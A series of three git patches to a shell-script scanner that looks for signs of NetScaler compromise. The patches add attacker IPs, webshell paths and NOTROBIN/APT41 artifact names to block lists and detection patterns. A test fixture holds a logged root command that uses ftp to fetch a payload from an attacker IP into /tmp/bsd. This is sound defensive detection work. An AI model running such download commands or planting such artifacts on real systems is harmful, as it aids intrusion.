From 85d36ed9a23ef325a8a50b1b84e01a4a1af175c6 Mon Sep 17 00:00:00 2001
From: William Ballenthin <william.ballenthin@fireeye.com>
Date: Tue, 24 Mar 2020 22:35:11 -0600
Subject: [PATCH 1/3] scanner: fs: add artifacts from upcoming blog post

---
 scanners/fs-paths.sh            | 41 +++++++++++++++++++++++++++++++++
 scanners/netscaler-content.sh   |  1 +
 tests/file-system/apt41/.test   |  0
 tests/file-system/apt41/tmp/bsd |  0
 tests/file-system/apt41/tmp/un  |  0
 5 files changed, 42 insertions(+)
 create mode 100644 tests/file-system/apt41/.test
 create mode 100644 tests/file-system/apt41/tmp/bsd
 create mode 100644 tests/file-system/apt41/tmp/un

diff --git a/scanners/fs-paths.sh b/scanners/fs-paths.sh
index f831303..93e30e7 100644
--- a/scanners/fs-paths.sh
+++ b/scanners/fs-paths.sh
@@ -14,6 +14,9 @@ scan_fs_notrobin() {
     declare -a notrobin_paths;
     notrobin_paths[0]="/var/nstmp/.nscache/httpd";
     notrobin_paths[1]="/tmp/.init/httpd";
+    # from subsequent post
+    notrobin_paths[2]="/var/nstmp/.nscache/prev.sh";
+    notrobin_paths[3]="/var/nstmp/.nscache/httpd-nscache_clean";
 
     local found=false;
     for notrobin_path in "${notrobin_paths[@]}"; do
@@ -45,11 +48,49 @@ scan_fs_isc_paths() {
     if [ "$found" != true ]; then
         debug "did not find artifact enumerated by SANS ISC";
     fi
+}
+
+scan_fs_apt41() {
+    declare -a paths;
+    paths[0]="/tmp/bsd";
+    paths[1]="/tmp/un";
+
+    local found=false;
+    for path in "${paths[@]}"; do
+        if [ -f "$root_directory/$path" ]; then
+            found=true;
+            report_match "$path, known path to post-exploitation artifact.";
+        fi
+    done
 
+    if [ "$found" != true ]; then
+        debug "did not find file system artifact";
+    fi
+}
+
+scan_fs_other_paths() {
+    declare -a paths;
+    paths[0]="/vpn/themes/imgs/tiny.php";
+    paths[1]="/vpn/themes/imgs/debug.php";
+    paths[2]="/vpn/themes/imgs/conn.php";
+
+    local found=false;
+    for path in "${paths[@]}"; do
+        if [ -f "$root_directory/$path" ]; then
+            found=true;
+            report_match "$path, known path to post-exploitation artifact.";
+        fi
+    done
+
+    if [ "$found" != true ]; then
+        debug "did not find file system artifact";
+    fi
 }
 
 scan_fs_known_paths() {
     scan_fs_netscalerd;
     scan_fs_notrobin;
     scan_fs_isc_paths;
+    scan_fs_apt41;
+    scan_fs_other_paths;
 }
diff --git a/scanners/netscaler-content.sh b/scanners/netscaler-content.sh
index e4345f9..4ab9780 100644
--- a/scanners/netscaler-content.sh
+++ b/scanners/netscaler-content.sh
@@ -59,6 +59,7 @@ ns_exploit_dirs[1]="/netscaler/portal/scripts/";
 ns_exploit_dirs[2]="/var/vpn/bookmark/";
 ns_exploit_dirs[3]="/var/tmp/netscaler/portal/templates/";
 ns_exploit_dirs[4]="/var/vpn/themes/";
+ns_exploit_dirs[5]="/var/vpn/theme/";
 
 # custom output formatting for matches.
 #   if the filename ends with .xml print the whole file,
diff --git a/tests/file-system/apt41/.test b/tests/file-system/apt41/.test
new file mode 100644
index 0000000..e69de29
diff --git a/tests/file-system/apt41/tmp/bsd b/tests/file-system/apt41/tmp/bsd
new file mode 100644
index 0000000..e69de29
diff --git a/tests/file-system/apt41/tmp/un b/tests/file-system/apt41/tmp/un
new file mode 100644
index 0000000..e69de29

From 6c590fe15c2888d12afa7f650ae4349ee8e3c6f3 Mon Sep 17 00:00:00 2001
From: William Ballenthin <william.ballenthin@fireeye.com>
Date: Tue, 24 Mar 2020 22:53:13 -0600
Subject: [PATCH 2/3] scanners: fs: add additional NOTROBIN artifacts from
 upcoming blog

---
 scanners/fs-paths.sh                          | 20 +++++++++++++++++++
 .../notrobin-var-vpn-theme-random/.test       |  0
 .../aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php      |  0
 .../notrobin-var-vpn-theme-y/.test            |  0
 .../aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa_y.pl     |  0
 5 files changed, 20 insertions(+)
 create mode 100644 tests/file-system/notrobin-var-vpn-theme-random/.test
 create mode 100644 tests/file-system/notrobin-var-vpn-theme-random/var/vpn/theme/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php
 create mode 100644 tests/file-system/notrobin-var-vpn-theme-y/.test
 create mode 100644 tests/file-system/notrobin-var-vpn-theme-y/var/vpn/theme/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa_y.pl

diff --git a/scanners/fs-paths.sh b/scanners/fs-paths.sh
index 93e30e7..51f5753 100644
--- a/scanners/fs-paths.sh
+++ b/scanners/fs-paths.sh
@@ -26,6 +26,26 @@ scan_fs_notrobin() {
         fi
     done
 
+    declare -a dirs;
+    dirs[0]="/var/vpn/theme";
+    dirs[1]="/var/vpn/themes";
+
+    declare -a blacklist;
+    blacklist[0]="[a-f0-9]\{32\}\.php";
+    blacklist[1]="[a-f0-9]\{32\}_[a-zA-Z0-9]\{1,12\}\.\(php\|pl\)";
+
+    for dir in "${dirs[@]}"; do
+        if [ -d "$root_directory/$dir" ]; then
+            for blackterm in "${blacklist[@]}"; do
+                local entries=$(ls "$root_directory/$dir" | grep "$blackterm");
+                if [ -n "$entries" ]; then
+                    found=true;
+                    report_match "$entries, known path to NOTROBIN artifact.";
+                fi
+            done
+        fi
+    done
+
     if [ "$found" != true ]; then
         debug "did not find NOTROBIN artifacts";
     fi
diff --git a/tests/file-system/notrobin-var-vpn-theme-random/.test b/tests/file-system/notrobin-var-vpn-theme-random/.test
new file mode 100644
index 0000000..e69de29
diff --git a/tests/file-system/notrobin-var-vpn-theme-random/var/vpn/theme/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php b/tests/file-system/notrobin-var-vpn-theme-random/var/vpn/theme/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php
new file mode 100644
index 0000000..e69de29
diff --git a/tests/file-system/notrobin-var-vpn-theme-y/.test b/tests/file-system/notrobin-var-vpn-theme-y/.test
new file mode 100644
index 0000000..e69de29
diff --git a/tests/file-system/notrobin-var-vpn-theme-y/var/vpn/theme/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa_y.pl b/tests/file-system/notrobin-var-vpn-theme-y/var/vpn/theme/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa_y.pl
new file mode 100644
index 0000000..e69de29

From 897c994ac89e3e5a5a8c7a4c5dd537c604c5973a Mon Sep 17 00:00:00 2001
From: William Ballenthin <william.ballenthin@fireeye.com>
Date: Tue, 24 Mar 2020 23:00:14 -0600
Subject: [PATCH 3/3] scanners: shell history, content: add additional
 blacklisted terms from upcoming blog post

---
 scanners/netscaler-content.sh            | 9 +++++++++
 scanners/shell-history.sh                | 9 +++++++++
 tests/shell-history/bsd/.test            | 0
 tests/shell-history/bsd/var/log/bash.log | 1 +
 4 files changed, 19 insertions(+)
 create mode 100644 tests/shell-history/bsd/.test
 create mode 100644 tests/shell-history/bsd/var/log/bash.log

diff --git a/scanners/netscaler-content.sh b/scanners/netscaler-content.sh
index 4ab9780..3627eb3 100644
--- a/scanners/netscaler-content.sh
+++ b/scanners/netscaler-content.sh
@@ -45,6 +45,15 @@ ns_content_blacklist[25]="198.44.227.126";
 ns_content_blacklist[26]="/tmp/l.sh";
 ns_content_blacklist[27]="Digest::MD5";
 ns_content_blacklist[28]="Could not execute command";
+# from subsequent NOTROBIN and/or APT41 blog posts from FEYE
+ns_content_blacklist[29]="/tmp/bsd";
+ns_content_blacklist[30]="/tmp/un";
+ns_content_blacklist[31]="66.42.98.220";
+ns_content_blacklist[32]="/var/nstmp/.nscache/prev.sh";
+ns_content_blacklist[33]="/var/nstmp/.nscache/httpd-nscache_clean";
+ns_content_blacklist[34]="/vpn/themes/imgs/tiny.php";
+ns_content_blacklist[35]="/vpn/themes/imgs/debug.php";
+ns_content_blacklist[36]="/vpn/themes/imgs/conn.php";
 
 declare -a ns_exploit_dirs;
 ns_exploit_dirs[0]="/netscaler/portal/templates/";
diff --git a/scanners/shell-history.sh b/scanners/shell-history.sh
index cb96e34..272f804 100644
--- a/scanners/shell-history.sh
+++ b/scanners/shell-history.sh
@@ -50,6 +50,15 @@ shell_history_blacklist[35]="157.157.87.22"
 shell_history_blacklist[36]="193.187.174.104"
 shell_history_blacklist[37]="62.113.112.33"
 shell_history_blacklist[38]="217.12.221.12"
+# from subsequent NOTROBIN and/or APT41 blog posts from FEYE
+shell_history_blacklist[39]="/tmp/bsd";
+shell_history_blacklist[40]="/tmp/un";
+shell_history_blacklist[41]="66.42.98.220";
+shell_history_blacklist[42]="/var/nstmp/.nscache/prev.sh";
+shell_history_blacklist[43]="/var/nstmp/.nscache/httpd-nscache_clean";
+shell_history_blacklist[44]="/vpn/themes/imgs/tiny.php";
+shell_history_blacklist[45]="/vpn/themes/imgs/debug.php";
+shell_history_blacklist[46]="/vpn/themes/imgs/conn.php";
 
 declare -a shell_history_paths;
 shell_history_paths[0]="/var/log/bash.log";
diff --git a/tests/shell-history/bsd/.test b/tests/shell-history/bsd/.test
new file mode 100644
index 0000000..e69de29
diff --git a/tests/shell-history/bsd/var/log/bash.log b/tests/shell-history/bsd/var/log/bash.log
new file mode 100644
index 0000000..f410a30
--- /dev/null
+++ b/tests/shell-history/bsd/var/log/bash.log
@@ -0,0 +1 @@
+Jan 19 24:26:52 <local7.notice> ns bash[1297]: root on /dev/pts/0 shell_command="/usr/bin/ftp -o /tmp/bsd ftp://xxxxxxxxxxxxxxxxxxxxxx66.42.98.220/bsd"